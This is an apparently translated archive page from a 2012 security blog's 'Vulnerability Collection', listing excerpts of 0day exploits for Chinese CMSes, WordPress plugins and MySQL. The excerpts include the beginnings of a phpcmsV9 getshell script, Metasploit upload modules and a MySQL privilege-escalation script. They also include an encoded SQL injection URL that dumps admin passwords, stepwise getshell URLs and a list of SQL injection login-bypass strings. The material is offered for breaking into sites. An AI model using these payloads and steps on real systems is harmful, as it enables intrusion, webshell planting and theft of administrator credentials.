This blog only collects technical articles and tools!

Category Archives: Vulnerability Collection

建站之星 (SiteStar) Latest 0DAY

2012.12.26, No Comments

Reposted from: https://www.t00ls.net/thread-21381-1-1.html //code by helen public function save_profile() { $user_info =@ ParamHolder::get('user', array());//get the array if (size...

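ECSHOP All-Versions Injection 0DAY

2012.12.26, No Comments

Add any product to the shopping cart; the page where the shipping address is filled in has a region selector: flow.php?step=consignee&direct_shopping=1 For example, select Anhui as the province. The POST data is as follows: country=1&province=3&city=37&district=409&consignee=11111&email=11111111%...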

WordPress Asset-Manager PHP File Upload Vulnerability

2012.12.26, No Comments

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more infor...

WordPress WP-Property PHP File Upload Vulnerability

2012.12.26, No Comments

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more infor...

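MySQL (Linux) Remote Database Privilege Escalation Vulnerability

2012.12.4, No Comments

The vulnerability was published on Seclist on December 1. The author tested it successfully on Debian Lenny (mysql-5.0.51a) and OpenSuSE 11.4 (5.1.53-log); once the code executes successfully, a MySQL administrator account is added. use DBI(); $|=1; =for comment MySQL privilege elevation ...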

phpcmsV9 Getshell Exp

2012.10.10, No Comments

<?php error_reporting(E_ERROR); set_time_limit(0); $pass="wooyun.in"; print_r(' +--------------------------------------------------------------------------...

shopex Front-End Ordinary User getshell: Latest Vulnerability

2012.09.28, No Comments

Exploitation method: First: find a way to obtain the absolute path of the target site http://www.wooyun.in/install/svinfo.php?phpinfo=true http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php htt...

AKCMS: Getting a Webshell via the Admin Backend

2012.09.21, 1 Comment

Dumping the administrator password: http://www.xxx.com/akcms_keyword.php?sid=11111%27and %28select%201%20from%28select%20count%28*%29,concat%28% 28select%20%28select%20%28select%20concat%280x7e,0×27, password,0×27...

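Shanda phpcmsv9 Admin Password Disclosure Vulnerability

2012.09.13, No Comments

I won't go into the cause of the vulnerability. The file is phpcms/api.php. Friends who are interested can dig for more holes in phpcms. Main exploitation process: Step 1: register a user http://www.i0day.com//index.php?m=member&c=index&a=register&siteid=1 Step 2: visit the link to reveal the table prefix http://www.i0day...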

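Complete Collection of Website Universal Passwords [Repost]

2012.08.9, No Comments

Universal passwords commonly used in penetration testing. A newly compiled collection of universal admin-login passwords for all kinds of website programs: many admin backends use default passwords admin admin admin admin888 asp aspx universal passwords 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a ...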